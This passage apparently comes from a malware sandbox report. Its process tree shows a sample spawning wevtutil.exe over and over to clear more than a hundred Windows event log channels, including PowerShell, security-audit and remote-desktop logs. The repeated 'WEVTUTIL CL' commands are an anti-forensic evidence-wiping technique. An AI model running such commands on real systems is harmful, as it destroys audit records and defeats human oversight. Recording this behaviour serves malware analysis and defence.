    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectWrite-FontCache/Tracing"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectWrite/Tracing"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
        5⤵
        
        PID:1820
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxpTaskRingtone/Analytic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Feedback-Service-TriggerProvider"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-GettingStarted/Diagnostic"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Help/Operational"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HotStart/Diagnostic"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPBusEnum/Tracing"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-International/Operational"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Diagnostic"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MCT/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/Operational"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/WHC"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-Machine/Diagnostic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PeopleNearMe/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Recovery/Operational"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
